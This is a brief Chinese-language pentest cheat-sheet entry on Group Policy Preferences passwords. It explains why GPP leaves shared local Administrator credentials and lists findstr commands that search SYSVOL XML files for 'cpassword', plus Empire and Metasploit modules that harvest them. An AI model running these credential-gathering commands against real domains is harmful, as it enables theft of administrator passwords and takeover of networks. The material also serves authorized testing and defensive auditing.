权限: User

描述:

GPP 是指组策略首选项,GPP 通过操作 GPO 对域中资源进行管理。

:::tips 产生原因:

每台Windows主机有一个内置的Administrator账户以及相关联的密码。大多数组织机构为了安全,可能都会要求更改密码,虽然这种方法的效果并不尽如人意。标准的做法是利用组策略去批量设置工作站的本地Administrator密码。但是这样又会出现另一个问题,那就是所有的电脑都会有相同的本地Administrator密码。也就是说,如果获取了一个系统的Administrator认证凭据,黑客就可以获取他们所有机器的管理权限

:::

CMD

  1. findstr /S cpassword %logonserver%\sysvol\*.xml
  2. findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Empire

  1. usemodule powershell/privesc/gpp
  2. usemodule python/privesc/windows/get_gpppasswords

MSF

  1. use post/windows/gather/credentials/gpp

如何攻击:

GPP Passwords - Pentest Everything